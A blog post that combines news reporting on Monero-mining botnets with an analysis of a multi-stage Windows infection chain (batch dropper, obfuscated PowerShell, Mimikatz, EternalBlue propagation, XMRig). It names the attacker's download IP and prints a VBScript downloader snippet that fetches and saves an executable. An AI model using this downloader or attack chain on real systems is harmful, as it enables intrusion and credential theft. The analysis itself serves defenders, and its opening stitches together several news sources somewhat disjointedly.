Ransomware could be dwarfed by a new malware that
effectively enslaves Windows machines into botnets to mine for Monero.
It snuck under the radar, however, since it does not
encrypt and lockdown files to demand bitcoin ransoms.
Instead, the stealthy malware brings monetary gains to
attackers by discreetly mining Monero, a cryptocurrency with enhanced privacy
features compared to bitcoin. Most victims are unlikely to even know that their
Windows computers are compromised.
The only symptoms of an infection are sluggish PC and
server performance and the loss of access to shared Windows drives.
Mining cryptocurrencies can be a costly investment as it
takes a monstrous amount of computing power, and thus hackers have started
using malware that steals computing resources of computers it hijacks to make
lots of dollars in digital currency.
cybercriminals
only made modifications to legitimate open source Monero mining software and
exploited a known vulnerability in Microsoft IIS 6.0 to secretly install the
miner on unpatched Windows servers.
It reports that
the attackers have been infecting unpatched Windows web servers with the
cryptocurrency miner since at least May 2017 to mine 'Monero,' a Bitcoin-like
cryptocurrency.
The vulnerability
(CVE-2017-7269) exploited by the attackers was discovered in March 2017 by
Zhiniang Peng and Chen Wu and resides in the WebDAV service of Microsoft IIS
version 6.0—the web server in Windows Server 2003 R2.
Since the vulnerability
is on a web server, which is meant to be visible from the internet, it can be
accessed and exploited by anyone. Unlike Bitcoin, Monero offers untraceable
transactions and is anonymous cryptocurrency in the world today.
Another reason of
hackers favouring Monero is that it uses a proof-of-work algorithm called
CryptoNight, which suits computer or server CPUs and GPUs, while Bitcoin mining
requires specific mining hardware.
Researchers say
the hacker uses a combination of old vulnerabilities and weak user/password
combinations to attack mostly old and unsupported Windows Server machines.
The most common
flaws exploited by the botnet operator include known phpMyAdmin configuration
flaws, exploits in JBoss, and bugs in Oracle Web Application Testing Suite,
MSSQL servers, ElasticSearch, Apache Tomcat, Oracle Weblogic, and other
services.
Once the hacker
gain access to a Windows Server machine, he deploys Visual Basic files to
gather information about the infected system and then install a Remote Access
Trojan (RAT) and a cryptocurrency miner to make a huge profit from the hacked
servers.
The following image shows the general view of the entire
attack path. As you might see from the picture, that flow could be considered a
complex flow since many specific artifacts were included in the attack phases.
The initial stage starts by abusing the user inexperience taking him/her
to click on a first stage file called (in my case) y1.bat.
Nowadays eMail vector is one of the most favorite vectors used by attackers and
easily implemented to deliver malicious contents. Once the first stage is run,
it downloads and executes a second stage file called info6.ps1: a
heavy obfuscated PowerShell script which drops (by de-obfuscate it directly on
body) three internal resources:
- Mimikatz.dll. This module is used to steal user administrative credentials.
- Utilities. This module is used to scan internal networks in order to propagate the infection, it is used to run several internal utilities such as (but not limited to): de-obfuscation routines, ordering arrays and running exploits. This module is also used to drop and execute an additional file (from the same server) named info.vbs.
- Exploits. This module is a set of known exploits such as eternalblue7_exploit and eternal_blue_powershell used from the initial stage of attack to infect internal machines .
The last stage (info.vbs) drops and runs an executable
file which has been recognized to be XMRig. XMRig is an open
sourced Monero CPU Miner, freely available on github. The infection tries to
propagate itself by scanning and attacking internal resources through the
Exploit module, while the XMRig module mines Monero cryptocurrency giving to
the attacker fresh "crypto money" by stealing victims
resources.
Analysis.
A romantic but still "working" .bat file is
propagated to the victim by email or message. Once the user clicks on it, the
.bat file would run the following command spawning a powershell able to
download and run a script called info6.ps1 from http://118.184.48.95:8000/
Stage1: Downloads and Run
|
The downloaded powershell file is clearly divided into
two macro blocks both of them obfuscated. The following image shows the two
visual sections which I am going to call them: "half up" (section
before the "new line") and "half down" (section after the
"new line").
Stage2: Two Visual Sections to be explored
|
While the "half up" section fairly appears to
be a Base64 encoded text file, the "half down" section looks like
encoded through a crafted function which, fortunately (and certain), appears in
clear text at the end of such a file. By editing that function it is possible
to modify the decoding process making it saving the decoded text file directly
to a desired folder. The following image shows the decoded second stage
"half down" section.
Decoded Second Stage "Half Down"
|
Analyzing the section code it would be easy to agree that
the main used functions are dynamically extracted from the file itself, by
performing a substring operations on the current content.
$funs=$fa.SubsTrIng(0,406492)
$mimi=$fa.sUBStrInG(406494,1131864)
$mon=$fa.suBstrING(1538360,356352)
$vcp=$fa.sUBStRiNG(1894714,880172)
$vcr=$fa.sUBstrINg(2774888,1284312)
$sc=$fa.sUBsTrinG(4059202)
The content of $fa variable and every function related to
it is placed in the "half up" section which after being decoded looks
like the following image.
Decoded Second Stage "Half Up"
|
Decoded Second Stage "Half Up"
|
The second stage "half up" code is borrowed
from Kevin Robertson (Irken), the attacker reused
many useful functionalities from Irken including the Invoke-TheHas routine
which could be used through SMB to execute commands or to executes direct code
having special rights.
A surprisingly interesting line of code is found on the
same stage (Second stage "half down"): NTLM= Get-creds mimi
mimi where the Get-creds function (coming from the Based64 decoded
"half up") runs, by using the reflectoin techique, a DLL function. So
by definition the mimi parameter has to be a DLL file included somewhere
in the code. Let's grab it by running the following code: $fa.sUBStrInG(406494,1131864) Where 406494 is the start
character and the 1131864 is the last character to be interpreted as a dynamic
loaded library. Fortunately the dropped DLL is a well known library, widely
used in penetration testing named Mimikatz. It would be clear
that the attacker uses the Mimikatz library to grab user (and eventually
administrators) passwords. Once the passwords stealing activity is done the
Malware starts to scan internal networks for known vulnerabilities such as
MS17/10. The identified exploits have been borrowed from tevora-thrat and woravit since same peace of
codes, same comments and same variable names have been found. If the Malware
finds vulnerability on local area networks it tries to infect the machine by
injecting itself (info6.ps1) through EthernalBlue and then it begins its
execution from the second Stage.
Contents include:
Set xPost = CreateObject("Microsoft.
xPost.Open "GET","http://XXXXXXXXX:
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "3.exe",2
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.